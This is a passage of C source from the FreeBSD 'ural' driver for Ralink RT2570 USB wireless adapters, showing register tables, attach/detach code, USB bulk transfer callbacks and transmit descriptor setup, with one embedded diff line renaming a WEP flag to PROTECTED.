URAL_DEV(MSI, RT2570_3), URAL_DEV(NOVATECH, NV902), URAL_DEV(RALINK, RT2570), URAL_DEV(RALINK, RT2570_2), URAL_DEV(RALINK, RT2570_3), URAL_DEV(SIEMENS2, WL54G), URAL_DEV(SMC, 2862WG), URAL_DEV(SPHAIRON, UB801R), URAL_DEV(SURECOM, RT2570), URAL_DEV(VTECH, RT2570), URAL_DEV(ZINWELL, RT2570), #undef URAL_DEV }; static usb_callback_t ural_bulk_read_callback; static usb_callback_t ural_bulk_write_callback; static usb_error_t ural_do_request(struct ural_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *ural_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void ural_vap_delete(struct ieee80211vap *); static void ural_tx_free(struct ural_tx_data *, int); static void ural_setup_tx_list(struct ural_softc *); static void ural_unsetup_tx_list(struct ural_softc *); static int ural_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void ural_setup_tx_desc(struct ural_softc *, struct ural_tx_desc *, uint32_t, int, int); static int ural_tx_bcn(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static int ural_tx_mgt(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static int ural_tx_data(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static void ural_start(struct ifnet *); static int ural_ioctl(struct ifnet *, u_long, caddr_t); static void ural_set_testmode(struct ural_softc *); static void ural_eeprom_read(struct ural_softc *, uint16_t, void *, int); static uint16_t ural_read(struct ural_softc *, uint16_t); static void ural_read_multi(struct ural_softc *, uint16_t, void *, int); static void ural_write(struct ural_softc *, uint16_t, uint16_t); static void ural_write_multi(struct ural_softc *, uint16_t, void *, int) __unused; static void ural_bbp_write(struct ural_softc *, uint8_t, uint8_t); static uint8_t ural_bbp_read(struct ural_softc *, uint8_t); static void ural_rf_write(struct ural_softc *, uint8_t, uint32_t); static void ural_scan_start(struct ieee80211com *); static void ural_scan_end(struct ieee80211com *); static void ural_set_channel(struct ieee80211com *); static void ural_set_chan(struct ural_softc *, struct ieee80211_channel *); static void ural_disable_rf_tune(struct ural_softc *); static void ural_enable_tsf_sync(struct ural_softc *); static void ural_enable_tsf(struct ural_softc *); static void ural_update_slot(struct ifnet *); static void ural_set_txpreamble(struct ural_softc *); static void ural_set_basicrates(struct ural_softc *, const struct ieee80211_channel *); static void ural_set_bssid(struct ural_softc *, const uint8_t *); static void ural_set_macaddr(struct ural_softc *, uint8_t *); static void ural_update_promisc(struct ifnet *); static void ural_setpromisc(struct ural_softc *); static const char *ural_get_rf(int); static void ural_read_eeprom(struct ural_softc *); static int ural_bbp_init(struct ural_softc *); static void ural_set_txantenna(struct ural_softc *, int); static void ural_set_rxantenna(struct ural_softc *, int); static void ural_init_locked(struct ural_softc *); static void ural_init(void *); static void ural_stop(struct ural_softc *); static int ural_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void ural_ratectl_start(struct ural_softc *, struct ieee80211_node *); static void ural_ratectl_timeout(void *); static void ural_ratectl_task(void *, int); static int ural_pause(struct ural_softc *sc, int timeout); /* * Default values for MAC registers; values taken from the reference driver. */ static const struct { uint16_t reg; uint16_t val; } ural_def_mac[] = { { RAL_TXRX_CSR5, 0x8c8d }, { RAL_TXRX_CSR6, 0x8b8a }, { RAL_TXRX_CSR7, 0x8687 }, { RAL_TXRX_CSR8, 0x0085 }, { RAL_MAC_CSR13, 0x1111 }, { RAL_MAC_CSR14, 0x1e11 }, { RAL_TXRX_CSR21, 0xe78f }, { RAL_MAC_CSR9, 0xff1d }, { RAL_MAC_CSR11, 0x0002 }, { RAL_MAC_CSR22, 0x0053 }, { RAL_MAC_CSR15, 0x0000 }, { RAL_MAC_CSR8, RAL_FRAME_SIZE }, { RAL_TXRX_CSR19, 0x0000 }, { RAL_TXRX_CSR18, 0x005a }, { RAL_PHY_CSR2, 0x0000 }, { RAL_TXRX_CSR0, 0x1ec0 }, { RAL_PHY_CSR4, 0x000f } }; /* * Default values for BBP registers; values taken from the reference driver. */ static const struct { uint8_t reg; uint8_t val; } ural_def_bbp[] = { { 3, 0x02 }, { 4, 0x19 }, { 14, 0x1c }, { 15, 0x30 }, { 16, 0xac }, { 17, 0x48 }, { 18, 0x18 }, { 19, 0xff }, { 20, 0x1e }, { 21, 0x08 }, { 22, 0x08 }, { 23, 0x08 }, { 24, 0x80 }, { 25, 0x50 }, { 26, 0x08 }, { 27, 0x23 }, { 30, 0x10 }, { 31, 0x2b }, { 32, 0xb9 }, { 34, 0x12 }, { 35, 0x50 }, { 39, 0xc4 }, { 40, 0x02 }, { 41, 0x60 }, { 53, 0x10 }, { 54, 0x18 }, { 56, 0x08 }, { 57, 0x10 }, { 58, 0x08 }, { 61, 0x60 }, { 62, 0x10 }, { 75, 0xff } }; /* * Default values for RF register R2 indexed by channel numbers. */ static const uint32_t ural_rf2522_r2[] = { 0x307f6, 0x307fb, 0x30800, 0x30805, 0x3080a, 0x3080f, 0x30814, 0x30819, 0x3081e, 0x30823, 0x30828, 0x3082d, 0x30832, 0x3083e }; static const uint32_t ural_rf2523_r2[] = { 0x00327, 0x00328, 0x00329, 0x0032a, 0x0032b, 0x0032c, 0x0032d, 0x0032e, 0x0032f, 0x00340, 0x00341, 0x00342, 0x00343, 0x00346 }; static const uint32_t ural_rf2524_r2[] = { 0x00327, 0x00328, 0x00329, 0x0032a, 0x0032b, 0x0032c, 0x0032d, 0x0032e, 0x0032f, 0x00340, 0x00341, 0x00342, 0x00343, 0x00346 }; static const uint32_t ural_rf2525_r2[] = { 0x20327, 0x20328, 0x20329, 0x2032a, 0x2032b, 0x2032c, 0x2032d, 0x2032e, 0x2032f, 0x20340, 0x20341, 0x20342, 0x20343, 0x20346 }; static const uint32_t ural_rf2525_hi_r2[] = { 0x2032f, 0x20340, 0x20341, 0x20342, 0x20343, 0x20344, 0x20345, 0x20346, 0x20347, 0x20348, 0x20349, 0x2034a, 0x2034b, 0x2034e }; static const uint32_t ural_rf2525e_r2[] = { 0x2044d, 0x2044e, 0x2044f, 0x20460, 0x20461, 0x20462, 0x20463, 0x20464, 0x20465, 0x20466, 0x20467, 0x20468, 0x20469, 0x2046b }; static const uint32_t ural_rf2526_hi_r2[] = { 0x0022a, 0x0022b, 0x0022b, 0x0022c, 0x0022c, 0x0022d, 0x0022d, 0x0022e, 0x0022e, 0x0022f, 0x0022d, 0x00240, 0x00240, 0x00241 }; static const uint32_t ural_rf2526_r2[] = { 0x00226, 0x00227, 0x00227, 0x00228, 0x00228, 0x00229, 0x00229, 0x0022a, 0x0022a, 0x0022b, 0x0022b, 0x0022c, 0x0022c, 0x0022d }; /* * For dual-band RF, RF registers R1 and R4 also depend on channel number; * values taken from the reference driver. */ static const struct { uint8_t chan; uint32_t r1; uint32_t r2; uint32_t r4; } ural_rf5222[] = { { 1, 0x08808, 0x0044d, 0x00282 }, { 2, 0x08808, 0x0044e, 0x00282 }, { 3, 0x08808, 0x0044f, 0x00282 }, { 4, 0x08808, 0x00460, 0x00282 }, { 5, 0x08808, 0x00461, 0x00282 }, { 6, 0x08808, 0x00462, 0x00282 }, { 7, 0x08808, 0x00463, 0x00282 }, { 8, 0x08808, 0x00464, 0x00282 }, { 9, 0x08808, 0x00465, 0x00282 }, { 10, 0x08808, 0x00466, 0x00282 }, { 11, 0x08808, 0x00467, 0x00282 }, { 12, 0x08808, 0x00468, 0x00282 }, { 13, 0x08808, 0x00469, 0x00282 }, { 14, 0x08808, 0x0046b, 0x00286 }, { 36, 0x08804, 0x06225, 0x00287 }, { 40, 0x08804, 0x06226, 0x00287 }, { 44, 0x08804, 0x06227, 0x00287 }, { 48, 0x08804, 0x06228, 0x00287 }, { 52, 0x08804, 0x06229, 0x00287 }, { 56, 0x08804, 0x0622a, 0x00287 }, { 60, 0x08804, 0x0622b, 0x00287 }, { 64, 0x08804, 0x0622c, 0x00287 }, { 100, 0x08804, 0x02200, 0x00283 }, { 104, 0x08804, 0x02201, 0x00283 }, { 108, 0x08804, 0x02202, 0x00283 }, { 112, 0x08804, 0x02203, 0x00283 }, { 116, 0x08804, 0x02204, 0x00283 }, { 120, 0x08804, 0x02205, 0x00283 }, { 124, 0x08804, 0x02206, 0x00283 }, { 128, 0x08804, 0x02207, 0x00283 }, { 132, 0x08804, 0x02208, 0x00283 }, { 136, 0x08804, 0x02209, 0x00283 }, { 140, 0x08804, 0x0220a, 0x00283 }, { 149, 0x08808, 0x02429, 0x00281 }, { 153, 0x08808, 0x0242b, 0x00281 }, { 157, 0x08808, 0x0242d, 0x00281 }, { 161, 0x08808, 0x0242f, 0x00281 } }; static const struct usb_config ural_config[URAL_N_TRANSFER] = { [URAL_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = (RAL_FRAME_SIZE + RAL_TX_DESC_SIZE + 4), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = ural_bulk_write_callback, .timeout = 5000, /* ms */ }, [URAL_BULK_RD] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = (RAL_FRAME_SIZE + RAL_RX_DESC_SIZE), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = ural_bulk_read_callback, }, }; static device_probe_t ural_match; static device_attach_t ural_attach; static device_detach_t ural_detach; static device_method_t ural_methods[] = { /* Device interface */ DEVMETHOD(device_probe, ural_match), DEVMETHOD(device_attach, ural_attach), DEVMETHOD(device_detach, ural_detach), DEVMETHOD_END }; static driver_t ural_driver = { .name = "ural", .methods = ural_methods, .size = sizeof(struct ural_softc), }; static devclass_t ural_devclass; DRIVER_MODULE(ural, uhub, ural_driver, ural_devclass, NULL, 0); MODULE_DEPEND(ural, usb, 1, 1, 1); MODULE_DEPEND(ural, wlan, 1, 1, 1); MODULE_VERSION(ural, 1); static int ural_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RAL_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(ural_devs, sizeof(ural_devs), uaa)); } static int ural_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct ural_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RAL_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, ural_config, URAL_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RAL_LOCK(sc); /* retrieve RT2570 rev. no */ sc->asic_rev = ural_read(sc, RAL_MAC_CSR0); /* retrieve MAC address and various other things from EEPROM */ ural_read_eeprom(sc); RAL_UNLOCK(sc); device_printf(self, "MAC/BBP RT2570 (rev 0x%02x), RF %s\n", sc->asic_rev, ural_get_rf(sc->rf_rev)); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "ural", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = ural_init; ifp->if_ioctl = ural_ioctl; ifp->if_start = ural_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_HOSTAP /* HostAp mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* bg scanning supported */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RAL_RF_5222) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_update_promisc = ural_update_promisc; ic->ic_raw_xmit = ural_raw_xmit; ic->ic_scan_start = ural_scan_start; ic->ic_scan_end = ural_scan_end; ic->ic_set_channel = ural_set_channel; ic->ic_vap_create = ural_vap_create; ic->ic_vap_delete = ural_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RAL_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RAL_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: ural_detach(self); return (ENXIO); /* failure */ } static int ural_detach(device_t self) { struct ural_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; /* prevent further ioctls */ RAL_LOCK(sc); sc->sc_detached = 1; RAL_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, URAL_N_TRANSFER); /* free TX list, if any */ RAL_LOCK(sc); ural_unsetup_tx_list(sc); RAL_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t ural_do_request(struct ural_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); if (ural_pause(sc, hz / 100)) break; } return (err); } static struct ieee80211vap * ural_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ural_softc *sc = ic->ic_ifp->if_softc; struct ural_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; uvp = (struct ural_vap *) malloc(sizeof(struct ural_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return NULL; vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = ural_newstate; usb_callout_init_mtx(&uvp->ratectl_ch, &sc->sc_mtx, 0); TASK_INIT(&uvp->ratectl_task, 0, ural_ratectl_task, uvp); ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void ural_vap_delete(struct ieee80211vap *vap) { struct ural_vap *uvp = URAL_VAP(vap); struct ieee80211com *ic = vap->iv_ic; usb_callout_drain(&uvp->ratectl_ch); ieee80211_draintask(ic, &uvp->ratectl_task); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void ural_tx_free(struct ural_tx_data *data, int txerr) { struct ural_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void ural_setup_tx_list(struct ural_softc *sc) { struct ural_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < RAL_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void ural_unsetup_tx_list(struct ural_softc *sc) { struct ural_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < RAL_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int ural_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ural_vap *uvp = URAL_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ural_softc *sc = ic->ic_ifp->if_softc; const struct ieee80211_txparam *tp; struct ieee80211_node *ni; struct mbuf *m; DPRINTF("%s -> %s\n", ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RAL_LOCK(sc); usb_callout_stop(&uvp->ratectl_ch); switch (nstate) { case IEEE80211_S_INIT: if (vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); /* force tx led to stop blinking */ ural_write(sc, RAL_MAC_CSR20, 0); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); if (vap->iv_opmode != IEEE80211_M_MONITOR) { if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } ural_update_slot(ic->ic_ifp); ural_set_txpreamble(sc); ural_set_basicrates(sc, ic->ic_bsschan); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); ural_set_bssid(sc, sc->sc_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) { m = ieee80211_beacon_alloc(ni, &uvp->bo); if (m == NULL) { device_printf(sc->sc_dev, "could not allocate beacon\n"); RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } ieee80211_ref_node(ni); if (ural_tx_bcn(sc, m, ni) != 0) { device_printf(sc->sc_dev, "could not send beacon\n"); RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } } /* make tx led blink on tx (controlled by ASIC) */ ural_write(sc, RAL_MAC_CSR20, 1); if (vap->iv_opmode != IEEE80211_M_MONITOR) ural_enable_tsf_sync(sc); else ural_enable_tsf(sc); /* enable automatic rate adaptation */ /* XXX should use ic_bsschan but not valid until after newstate call below */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) ural_ratectl_start(sc, ni); ieee80211_free_node(ni); break; default: break; } RAL_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void ural_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct ural_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap; struct ural_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete, %d bytes\n", len); /* free resources */ data = usbd_xfer_get_priv(xfer); ural_tx_free(data, 0); usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)(RAL_FRAME_SIZE + RAL_TX_DESC_SIZE)) { DPRINTFN(0, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = (RAL_FRAME_SIZE + RAL_TX_DESC_SIZE); } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, RAL_TX_DESC_SIZE); usbd_m_copy_in(pc, RAL_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct ural_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m); } /* xfer length needs to be a multiple of two! */ len = (RAL_TX_DESC_SIZE + m->m_pkthdr.len + 1) & ~1; if ((len % 64) == 0) len += 2; DPRINTFN(11, "sending frame len=%u xferlen=%u\n", m->m_pkthdr.len, len); usbd_xfer_set_frame_len(xfer, 0, len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } RAL_UNLOCK(sc); ural_start(ifp); RAL_LOCK(sc); break; default: /* Error */ DPRINTFN(11, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); if (data != NULL) { ural_tx_free(data, error); usbd_xfer_set_priv(xfer, NULL); } if (error == USB_ERR_STALLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); break; } } static void ural_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct ural_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct mbuf *m = NULL; struct usb_page_cache *pc; uint32_t flags; int8_t rssi = 0, nf = 0; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", len); if (len < (int)(RAL_RX_DESC_SIZE + IEEE80211_MIN_LEN)) { DPRINTF("%s: xfer too short %d\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; goto tr_setup; } len -= RAL_RX_DESC_SIZE; /* rx descriptor is located at the end */ pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, len, &sc->sc_rx_desc, RAL_RX_DESC_SIZE); rssi = URAL_RSSI(sc->sc_rx_desc.rssi); nf = RAL_NOISE_FLOOR; flags = le32toh(sc->sc_rx_desc.flags); if (flags & (RAL_RX_PHY_ERROR | RAL_RX_CRC_ERROR)) { /* * This should not happen since we did not * request to receive those frames when we * filled RAL_TXRX_CSR2: */ DPRINTFN(5, "PHY or CRC error\n"); ifp->if_ierrors++; goto tr_setup; } m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; goto tr_setup; } usbd_copy_out(pc, 0, mtod(m, uint8_t *), len); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (flags >> 16) & 0xfff; if (ieee80211_radiotap_active(ic)) { struct ural_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX set once */ tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(sc->sc_rx_desc.rate, (flags & RAL_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antenna = sc->rx_ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } /* Strip trailing 802.11 MAC FCS. */ m_adj(m, -IEEE80211_CRC_LEN); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ RAL_UNLOCK(sc); if (m) { ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) ural_start(ifp); RAL_LOCK(sc); return; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } return; } } static uint8_t ural_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void ural_setup_tx_desc(struct ural_softc *sc, struct ural_tx_desc *desc, uint32_t flags, int len, int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(RAL_TX_NEWSEQ); desc->flags |= htole32(len << 16); desc->wme = htole16(RAL_AIFSN(2) | RAL_LOGCWMIN(3) | RAL_LOGCWMAX(5)); desc->wme |= htole16(RAL_IVOFFSET(sizeof (struct ieee80211_frame))); /* setup PLCP fields */ desc->plcp_signal = ural_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RAL_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RAL_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } desc->iv = 0; desc->eiv = 0; } #define RAL_TX_TIMEOUT 5000 static int ural_tx_bcn(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = sc->sc_ifp; const struct ieee80211_txparam *tp; struct ural_tx_data *data; if (sc->tx_nfree == 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m0); ieee80211_free_node(ni); return (EIO); } if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { m_freem(m0); ieee80211_free_node(ni); return (ENXIO); } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; ural_setup_tx_desc(sc, &data->desc, RAL_TX_IFS_NEWBACKOFF | RAL_TX_TIMESTAMP, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending beacon frame len=%u rate=%u\n", m0->m_pkthdr.len, tp->mgmtrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return (0); } static int ural_tx_mgt(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_txparam *tp; struct ural_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; uint32_t flags; uint16_t dur; RAL_LOCK_ASSERT(sc, MA_OWNED); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } wh = mtod(m0, struct ieee80211_frame *); } data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RAL_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, tp->mgmtrate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= RAL_TX_TIMESTAMP; } ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending mgt frame len=%u rate=%u\n", m0->m_pkthdr.len, tp->mgmtrate); 